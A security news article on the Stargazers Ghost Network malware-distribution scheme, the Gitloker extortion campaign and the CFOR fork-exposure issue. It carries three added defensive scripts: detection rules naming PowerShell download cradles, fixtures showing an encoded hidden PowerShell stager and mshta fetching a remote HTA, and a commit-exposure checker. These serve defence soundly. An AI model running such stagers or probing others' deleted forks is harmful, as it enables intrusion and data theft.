'Stargazer Goblin' Creates 3,000 Fake GitHub Accounts for Malware Spread

A threat actor tracked as Stargazer Goblin has built a network of fake GitHub accounts to run a Distribution-as-a-Service (DaaS) operation that spreads a variety of information-stealing malware, earning an estimated $100,000 in illicit revenue over the past year.

The network, which spans more than 3,000 accounts on the code-hosting platform, comprises numerous repositories used to distribute malicious links or malware, according to Check Point, which has dubbed the operation the "Stargazers Ghost Network."

Malware families distributed this way include Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine. The fake accounts also star, fork, watch, and subscribe to the malicious repositories to make them appear legitimate.

The network is believed to have been active in a basic form since August 2022, although an advertisement for the DaaS only surfaced in early July 2023.

“Threat actors are now managing a network of ‘Ghost’ profiles that distribute malware through malicious links on their repositories and encrypted archives as well,” Check Point researcher Antonis Terefos said in an analysis published last week.

“This network not only transmits malware but also engages in various other actions that make these ‘Ghost’ profiles appear as legitimate users, providing fake credibility to their activities and the linked repositories.”

Different categories of GitHub accounts handle separate parts of the scheme, which makes the operation more resilient to GitHub's takedowns of flagged malicious payloads on the platform.


These include accounts that host the phishing repository template, accounts that supply the image used in the phishing template, and accounts that push the malware to repositories as password-protected archives posing as cracked software and game cheats.

If the third group of accounts is detected and banned by GitHub, Stargazer Goblin updates the first account's phishing repository with a fresh link to a new, still-active malicious release, allowing the operators to carry on unimpeded.

Besides starring new releases across multiple repositories and editing README.md files to update the download links, there are indications that some accounts in the network were previously compromised, most likely through credentials harvested by information-stealing malware.

“In most cases, we see that Repository and Stargazer profiles remain unaffected by bans and repository takedowns, while Commit and Release profiles are typically banned once their malevolent repositories are detected,” Terefos remarked.

“Link-Repositories with links to banned Release-Repositories are commonly found. When this occurs, the Commit profile tied to the Link-Repository updates the harmful link with a fresh one.”
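The role separation above works because the "Stargazer" accounts that star, fork and watch the repositories are rarely banned, so a repository's popularity signals cannot be taken at face value. The following script is an added example (not Check Point's tooling) of the triage a defender can run on a repository's stargazers before trusting a "popular" cracked-software or game-cheat repo. The record shapes follow GitHub's REST API (the stargazers endpoint with the `application/vnd.github.star+json` media type returns `starred_at` plus the user, and `GET /users/{login}` returns `created_at`, `followers`, `following` and `public_repos`); the accounts, timestamps and scoring thresholds are constructed assumptions, not data from the report.

```python
"""Triage a repository's stargazers for 'ghost account' signals.

Added example (not Check Point's tooling). Record shapes follow GitHub's REST
API: GET /repos/{owner}/{repo}/stargazers with the media type
'application/vnd.github.star+json' returns {"starred_at", "user"}, and
GET /users/{login} returns created_at, followers, following, public_repos.
Every record below is constructed; the thresholds are assumptions to tune.
"""
from datetime import datetime, timedelta, timezone

NOW = datetime(2024, 7, 29, 12, 0, tzinfo=timezone.utc)  # constructed clock
SUSPICIOUS_AT = 3                                         # assumed cut-off score


def parse_ts(ts: str) -> datetime:
    """GitHub timestamps are ISO-8601 in UTC, e.g. 2024-07-10T09:15:00Z."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc)


def account_score(user: dict, now: datetime = NOW) -> int:
    """Higher means more ghost-like: a young, unconnected, empty account."""
    score = 0
    if now - parse_ts(user["created_at"]) < timedelta(days=90):
        score += 2
    if user["followers"] == 0 and user["following"] == 0:
        score += 1
    if user["public_repos"] <= 1:
        score += 1
    return score


def max_stars_in_window(stars: list, window: timedelta = timedelta(hours=1)) -> int:
    """Largest number of stars landing inside any sliding window (burst size)."""
    times = sorted(parse_ts(s["starred_at"]) for s in stars)
    best = start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def triage(stars: list, users: list, now: datetime = NOW) -> dict:
    """Join star events to account profiles and report flagged logins + burst size."""
    by_login = {u["login"]: u for u in users}
    flagged = [s["user"]["login"] for s in stars
               if account_score(by_login[s["user"]["login"]], now) >= SUSPICIOUS_AT]
    return {"total": len(stars), "flagged": flagged,
            "max_burst": max_stars_in_window(stars)}


def build_sample() -> tuple:
    """Constructed data: eight fresh, empty accounts star within 15 minutes,
    four established accounts star weeks apart."""
    stars, users = [], []
    for i in range(8):
        login = f"ghost{i:02d}"
        users.append({"login": login, "created_at": "2024-07-10T09:15:00Z",
                      "followers": 0, "following": 0, "public_repos": 0})
        stars.append({"starred_at": f"2024-07-28T21:{2 * i:02d}:00Z",
                      "user": {"login": login}})
    organic_stars = ["2024-05-01T10:00:00Z", "2024-06-03T16:30:00Z",
                     "2024-07-01T08:45:00Z", "2024-07-27T08:00:00Z"]
    for i, ts in enumerate(organic_stars):
        login = f"dev{i}"
        users.append({"login": login, "created_at": "2019-03-12T12:00:00Z",
                      "followers": 30, "following": 12, "public_repos": 15})
        stars.append({"starred_at": ts, "user": {"login": login}})
    return stars, users


if __name__ == "__main__":
    report = triage(*build_sample())
    print(f"{len(report['flagged'])}/{report['total']} stargazers look like ghost "
          f"accounts; largest 1-hour burst: {report['max_burst']} stars")
```

Against the constructed sample the script flags eight of twelve stargazers and a burst of eight stars inside one hour. The two signals are deliberately separate: a single fresh account is unremarkable, but many fresh, follower-less accounts starring within minutes of each other is the pattern the report describes, and the burst check catches it even when individual profiles have been aged or padded.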

One campaign uncovered by Check Point uses a malicious link to a GitHub repository that redirects to a PHP script hosted on a WordPress site, which in turn delivers an HTML Application (HTA) file that runs a PowerShell script to execute Atlantida Stealer.
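The HTA-to-PowerShell hand-off in that chain is visible in process-creation telemetry regardless of which stealer is ultimately dropped. The script below is an added detection example (not Check Point's) that runs three rules over Sysmon Event ID 1 style events: `mshta.exe` spawning a shell, `mshta.exe` launched with a remote URL, and PowerShell started with encoded-command, download-cradle or hidden-window switches. The events are constructed to mirror the chain described above, not real telemetry, and the `.invalid` host is a placeholder.

```python
"""Flag the mshta.exe -> PowerShell pattern in process-creation telemetry.

Added detection example, not Check Point's. Events use Sysmon Event ID 1
field names (Image, ParentImage, CommandLine); the events below are
constructed to mirror the chain described in the article, not real telemetry.
"""
import re

SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
REMOTE = re.compile(r"(?i)https?://")
# Download cradles, encoded payloads and window hiding typical of stager scripts.
PS_STAGER = re.compile(
    r"(?i)(-e(nc(odedcommand)?)?\b|downloadstring|downloadfile|invoke-webrequest|"
    r"\biwr\b|-w(indowstyle)?\s+hidden)"
)


def basename(path: str) -> str:
    """Lower-cased file name from a Windows path."""
    return path.lower().rsplit("\\", 1)[-1]


def classify(event: dict) -> list:
    """Names of the rules that fire for one process-creation event."""
    parent = basename(event.get("ParentImage", ""))
    image = basename(event.get("Image", ""))
    cmd = event.get("CommandLine", "")
    hits = []
    if parent == "mshta.exe" and image in SHELLS:
        hits.append("mshta_spawns_shell")
    if image == "mshta.exe" and REMOTE.search(cmd):
        hits.append("mshta_remote_hta")
    if image in {"powershell.exe", "pwsh.exe"} and PS_STAGER.search(cmd):
        hits.append("powershell_stager_flags")
    return hits


def scan(events: list) -> list:
    """(event index, rule name) for every rule that fires across the batch."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


# Constructed sample: benign browser and scheduled-task activity around a
# downloaded HTA that launches a hidden, encoded PowerShell stager.
SAMPLE_EVENTS = [
    {"Image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Google\Chrome\Application\chrome.exe"'},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" "C:\Users\dev\Downloads\Setup.hta"'},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -w hidden -ep bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "CommandLine": r'"C:\Windows\System32\mshta.exe" https://wp-site.invalid/wp-content/uploads/setup.hta'},
]


if __name__ == "__main__":
    for index, rule in scan(SAMPLE_EVENTS):
        print(f"event {index}: {rule}")
```

Note that the locally opened `Setup.hta` (event 1) fires nothing on its own; it is the child PowerShell with `-w hidden -enc` under an `mshta.exe` parent that produces the high-confidence alert, while the maintenance script started by `svchost.exe` stays quiet. Tune `PS_STAGER` against your own baseline before deploying; `-ep bypass` alone is common in legitimate automation and is deliberately not matched here.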

Other malware families spread through the DaaS include Lumma Stealer, RedLine Stealer, Rhadamanthys, and RisePro. Check Point also found that the GitHub accounts are part of a larger DaaS offering that operates similar ghost accounts on other platforms such as Discord, Facebook, Instagram, X, and YouTube.


“Stargazer Goblin has devised an incredibly intricate malware dissemination mechanism that evades detection by leveraging GitHub’s legitimacy, dispels suspicions of malicious operations, and mitigates and recovers from any disruptions caused when GitHub thwarts their network,” Terefos stated.

“By employing multiple profiles and personas carrying out distinct functions from promoting to housing the repository, committing the phishing pattern, and hosting harmful releases, the Stargazers Ghost Network can minimize their losses when GitHub intervenes with their operations, as typically only a segment of the entire operation is affected instead of all associated profiles being disrupted.”

The disclosure comes as unidentified attackers are targeting GitHub repositories, wiping their contents, and instructing victims to contact a persona named Gitloker on Telegram in an extortion campaign that has been active since February 2024.

The social engineering campaign targets developers with phishing emails sent from "notifications@github.com," luring them to click on fake links under the pretext of a job opportunity at GitHub. Victims are then prompted to authorize a new OAuth application, which deletes all of their repositories and demands a ransom to restore access.

The findings also follow a warning from Truffle Security that sensitive data can be retrieved from deleted forks, deleted repositories, and even private repositories on GitHub, prompting organizations to defend against what the company calls a Cross Fork Object Reference (CFOR) vulnerability.

“A CFOR vulnerability occurs when one repository fork can retrieve confidential information from another fork (including data from private and deleted forks),” Joe Leon said. “Analogous to an Insecure Direct Object Reference, in CFOR users provide commit hashes to directly retrieve commit information that would otherwise remain unseen to them.”

Put differently, code committed to a public fork can remain accessible indefinitely as long as at least one fork of that repository exists. The same mechanism can also retrieve code committed between the moment an internal fork is created and the moment the repository is made public.

Note that these are deliberate design decisions on GitHub's part, as the company states in its own documentation:

  • Commits to any repository in a fork network can be accessed from any repository in the same fork network, including the upstream repository
  • When you change a private repository to public, all the commits in that repository, including any commits made in the repositories it was forked into, will become visible to everyone.

“The typical user perceives the partition between private and public repositories as a security boundary, and understandably assumes that any data within a private repository cannot be retrieved by public users,” Leon said.

“Regrettably, […] this is not always accurate. Furthermore, the act of deletion implies the destruction of data. As seen earlier, deleting a repository or fork does not signify that your commit information is genuinely deleted.”
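Because a fork network serves any of its commits by hash, the practical check after a fork is deleted or a repository is flipped to public is to ask the upstream repository for each hash you are worried about. The script below is an added example, not Truffle Security's tooling: it assumes the REST endpoint `GET /repos/{owner}/{repo}/commits/{sha}` resolves commits across the fork network in the way GitHub's documentation describes, takes an injectable `fetch` so it can be exercised offline, and uses a constructed owner, repository and pair of SHAs as placeholders.

```python
"""Check whether commit hashes are still served through an upstream repository.

Added example, not Truffle Security's tooling. Assumes the REST endpoint
GET /repos/{owner}/{repo}/commits/{sha} resolves any commit in the fork
network (the behaviour GitHub documents for fork networks). The owner,
repository and SHAs used in the demo are constructed placeholders.
"""
import json
import urllib.error
import urllib.request

API = "https://api.github.com"


def http_get(url: str, token: str = None) -> tuple:
    """Return (HTTP status, decoded JSON body or {}) for a GitHub API URL."""
    req = urllib.request.Request(url, headers={
        "Accept": "application/vnd.github+json",
        "User-Agent": "cfor-exposure-check",
    })
    if token:
        req.add_header("Authorization", f"Bearer {token}")
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return resp.status, json.loads(resp.read().decode())
    except urllib.error.HTTPError as err:
        return err.code, {}


def commit_reachable(owner: str, repo: str, sha: str, fetch=http_get) -> bool:
    """True when the upstream repository serves this commit (HTTP 200), even if
    it was only ever pushed to a fork that has since been deleted."""
    status, body = fetch(f"{API}/repos/{owner}/{repo}/commits/{sha}")
    return status == 200 and body.get("sha", "").startswith(sha)


def exposed_commits(owner: str, repo: str, shas: list, fetch=http_get) -> list:
    """Subset of SHAs that are still publicly retrievable via the upstream."""
    return [sha for sha in shas if commit_reachable(owner, repo, sha, fetch)]


# Constructed placeholders: one SHA that "belonged" to a deleted fork and is
# still served by the upstream, one that was never in the fork network.
DEMO_SHAS = [
    "0a1b2c3d4e5f60718293a4b5c6d7e8f901234567",
    "ffffffffffffffffffffffffffffffffffffffff",
]
FAKE_RESPONSES = {
    f"{API}/repos/example-org/widgets/commits/{DEMO_SHAS[0]}": (200, {"sha": DEMO_SHAS[0]}),
    f"{API}/repos/example-org/widgets/commits/{DEMO_SHAS[1]}": (404, {}),
}


def fake_fetch(url: str, token: str = None) -> tuple:
    """Stand-in for http_get so the demo runs without network access."""
    return FAKE_RESPONSES.get(url, (404, {}))


if __name__ == "__main__":
    # Real use: collect hashes with `git log --all --format=%H` in the fork or in
    # the pre-publication clone, then call exposed_commits(..., fetch=http_get)
    # with a token from the environment to avoid unauthenticated rate limits.
    for sha in exposed_commits("example-org", "widgets", DEMO_SHAS, fetch=fake_fetch):
        print(f"still public via upstream: {sha}")
```

Treat any hash that comes back 200 as fully public and rotate every secret it contains; a 404 from this one endpoint is not proof that the data is unrecoverable by other routes, so the safe rule remains the one Leon states: anything ever pushed to a repository in the fork network should be assumed exposed.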
